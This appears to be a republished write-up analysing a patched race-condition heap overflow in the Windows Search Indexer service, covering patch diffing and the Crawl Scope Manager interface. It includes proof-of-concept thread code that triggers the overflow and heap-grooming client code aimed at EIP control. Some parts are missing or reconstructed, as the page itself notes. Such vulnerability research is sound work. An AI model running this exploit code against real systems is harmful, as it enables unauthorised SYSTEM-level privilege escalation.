
An Example Analysis of Local Privilege Escalation in Windows Search Indexer

2025-04-01 Update From: SLTechnology News&Howtos shulou


Shulou(Shulou.com)06/01 Report--

In this issue, the editor brings you an example analysis of local privilege escalation in Windows Search Indexer. The article is rich in content and analyzes the topic from a professional point of view. I hope you get something out of reading it.

Windows Search Indexer introduction

Windows Search Indexer is a Windows service that handles file indexing for Windows Search, the built-in Windows file search engine that backs everything from the Start menu search box to Windows Explorer and even the Libraries feature.

From a GUI perspective, Search Indexer exposes its service interface to users through the Indexing Options dialog, as shown below.

All databases and temporary data produced during indexing are stored and managed as files. As is typical for a Windows service, the whole process runs with NT AUTHORITY\SYSTEM privileges, so if a logic vulnerability allows the file path to be manipulated, privilege escalation may be possible (for example, through symlink attacks).

Given that most recent Windows service vulnerabilities are LPE vulnerabilities caused by logic bugs, we assumed Search Indexer might have a similar one. Our analysis showed otherwise, and we will cover the details later.

Patch comparison

Our analysis environment is Windows 7 x86, because its update files are small and differences are easy to identify. We downloaded two patch versions of the module.

You can download them from the Microsoft updates directory:

Version from the January update: KB4534314

Version from the February update: KB4537813

We start with a BinDiff of the binaries changed by the patch (in this case there is only one: searchindexer.exe).

Most of the patched code is in the CSearchCrawlScopeManager and CSearchRoot classes. The former was patched in January and the latter in the following month. Both classes received the same kind of change, so we focus on the patch to CSearchRoot.

The following figure shows that the original code was changed to take a lock around access to the shared resource. Since the patched functions are a putter and a getter, we infer that unsynchronized access to the shared resource led to a race condition vulnerability.

Interface interaction

We looked at MSDN to see how these classes are used and found that they are all related to the crawl scope manager, whose method information we can look up.

MSDN says:

The Crawl Scope Manager (CSM) is a set of APIs for adding, removing, and enumerating search roots and scope rules for the Windows Search indexer. When you want the indexer to start crawling a new container, use the CSM to set a search root and to set scope rules for the paths to be searched under that root.

The CSM interface is as follows:

IEnumSearchRoots

IEnumSearchScopeRules

ISearchCrawlScopeManager

ISearchCrawlScopeManager2

ISearchRoot

ISearchScopeRule

ISearchItem

For example, adding, removing, and enumerating search roots and scope rules can be written as follows:

ISearchCrawlScopeManager tells the search engine which containers to crawl and/or monitor, and which items under those containers to include or exclude. To add a new search root, you instantiate an ISearchRoot object, set its root properties, and then call ISearchCrawlScopeManager::AddRoot, passing it the pointer to the ISearchRoot object.

    // Add RootInfo & ScopeRule
    pISearchRoot->put_RootURL(L"file:///C:\\");
    pSearchCrawlScopeManager->AddRoot(pISearchRoot);
    pSearchCrawlScopeManager->AddDefaultScopeRule(L"file:///C:\\Windows", fInclude, FF_INDEXCOMPLEXURLS);
    // Set Registry key
    pSearchCrawlScopeManager->SaveAll();

When we no longer want a URL indexed, we can also use ISearchCrawlScopeManager to remove the root from the crawl scope. Removing a root also removes all scope rules for that URL: when uninstalling an application, for example, we delete all its data and then remove its search root from the crawl scope, and the Crawl Scope Manager deletes the root and all scope rules associated with it.

    // Remove RootInfo & Scope Rule
    pSearchCrawlScopeManager->RemoveRoot(pszURL);
    // Set Registry key
    pSearchCrawlScopeManager->SaveAll();

CSM uses the IEnumSearchRoots enumeration to enumerate search roots. Such enumerations serve various purposes: for example, we might want to display the entire crawl scope in a user interface, or find out whether a particular root, or a child of it, is already in the crawl scope.

    // Display RootInfo
    PWSTR pszUrl = NULL;
    pSearchRoot->get_RootURL(&pszUrl);
    wcout << pszUrl;

    // Enumerate scope rules; the stream operators and part of this loop were lost in extraction
    ... ->Next(1, &pSearchScopeRule, NULL) ...
    pSearchScopeRule->get_PatternOrURL(&pszUrl);
    wcout << pszUrl;
    ... ->get_RootURL(&pszUrl);
    wcout << pszUrl;

(The text between the enumeration example and the proof-of-concept thread code is missing from this page.)

    // Putter thread: rewrites RootURL in a tight loop with strings of different lengths.
    // The function header is reconstructed from thread_getter below and the CreateThread
    // call in the client code; the page only preserves the loop body.
    DWORD __stdcall thread_putter(LPVOID param) {
        ISearchRoot* pSearchManager = (ISearchRoot*)param;
        while (1) {
            pSearchManager->put_RootURL(L"AA");
            pSearchManager->put_RootURL(L"AAAAAAAAAA");
        }
        return 0;
    }

    // Getter thread: reads RootURL in a tight loop while the putter rewrites it
    DWORD __stdcall thread_getter(LPVOID param) {
        ISearchRoot* pISearchRoot = (ISearchRoot*)param;
        PWSTR get_pszUrl;
        while (1) {
            pISearchRoot->get_RootURL(&get_pszUrl);
        }
        return 0;
    }

It crashes!

There is no doubt that the race condition won before the StringCchCopyW function copied the RootURL data, resulting in a heap overflow.
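The pattern behind that crash, as an added simplified model that is not the article's or Microsoft's code: one RootURL string shared by the putter and the getter, where the getter sizes its output from the length it observes and only then copies, so a put_RootURL landing between those two steps makes the copy overrun. The field names, the single-threaded hook standing in for the second thread, and the flag standing in for the lock the February patch added are all assumptions.

```cpp
#include <cstring>
#include <functional>
#include <string>
#include <vector>

// Assumed model of the CSearchRoot RootURL property: a NUL-terminated heap
// string plus a simulated lock. Single-threaded on purpose: the "other
// thread" is a hook run at the exact point where the race window opens.
struct RootUrl {
    std::vector<wchar_t> buf;   // heap copy of the URL, NUL-terminated
    bool locked = false;        // simulated lock; true while a method holds it
};

// Putter: replaces the stored URL. Returns false if it could not take the
// lock (in the patched build it would block until the getter releases it).
bool put_RootURL(RootUrl& r, const std::wstring& url, bool patched) {
    if (patched && r.locked) return false;
    r.buf.assign(url.begin(), url.end());
    r.buf.push_back(L'\0');
    return true;
}

// Getter: sizes the output from the length it observes, then copies the
// string (StringCchCopyW in the service). Returns false if the copy would
// run past the output buffer, i.e. the heap overflow described above.
bool get_RootURL(RootUrl& r, std::wstring& out, bool patched,
                 const std::function<void()>& other_thread) {
    if (patched) r.locked = true;
    size_t cch = r.buf.size();               // step 1: length read now
    if (other_thread) other_thread();        // race window: a putter may run here
    std::vector<wchar_t> dst(cch);           // output sized from the stale length
    bool safe = r.buf.size() <= dst.size();  // step 2 would overrun dst if false
    if (safe) {
        std::memcpy(dst.data(), r.buf.data(), r.buf.size() * sizeof(wchar_t));
        out.assign(dst.data());
    }
    if (patched) r.locked = false;
    return safe;
}

// One get with a longer put landing in the window. Returns true when the
// getter completed without an overflow; `patched` selects lock or no lock.
bool race_once(bool patched, std::wstring& out) {
    RootUrl r;
    put_RootURL(r, L"file:///C:\\", patched);
    bool put_ran = false;
    bool safe = get_RootURL(r, out, patched, [&] {
        put_ran = put_RootURL(r, std::wstring(64, L'A'), patched);  // "AAAA..." as in the PoC
    });
    if (!put_ran) put_RootURL(r, std::wstring(64, L'A'), patched);   // patched: runs after the get
    return safe;
}
```

Unpatched, the getter allocates 12 wide characters and then sees a 65-character string to copy; patched, the put is held off until the getter has finished, and the copy fits.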

Hijack EIP

To control EIP, we need to place an object on the vulnerable server heap.

We wrote the following client code to track the heap status.

    #include <windows.h>
    #include <searchapi.h>   // ISearchRoot, CLSID_CSearchRoot

    int wmain(int argc, wchar_t* argv[]) {
        CoInitializeEx(NULL, COINIT_MULTITHREADED | COINIT_DISABLE_OLE1DDE);
        ISearchRoot* pISearchRoot[20];
        // Create 20 out-of-process CSearchRoot objects in the service
        for (int i = 0; i < 20; i++) {
            CoCreateInstance(CLSID_CSearchRoot, NULL, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&pISearchRoot[i]));
        }
        // Release every other object to open holes in the server heap
        pISearchRoot[3]->Release();
        pISearchRoot[5]->Release();
        pISearchRoot[7]->Release();
        pISearchRoot[9]->Release();
        pISearchRoot[11]->Release();
        // Race the putter and getter on one of the remaining objects
        CreateThread(NULL, 0, thread_putter, (LPVOID)pISearchRoot[13], 0, NULL);
        CreateThread(NULL, 0, thread_getter, (LPVOID)pISearchRoot[13], 0, NULL);
        Sleep(500);
        CoUninitialize();
        return 0;
    }

We found that if the client does not release a pISearchRoot object, its IRpcStubBuffer object remains on the server heap. We also see that the IRpcStubBuffer object sits near the heap location where the vulnerability occurred.

    0:010> !heap -p -all
    ...
    03d58f10 0005 0005  [00]   03d58f18    0001a - (busy)
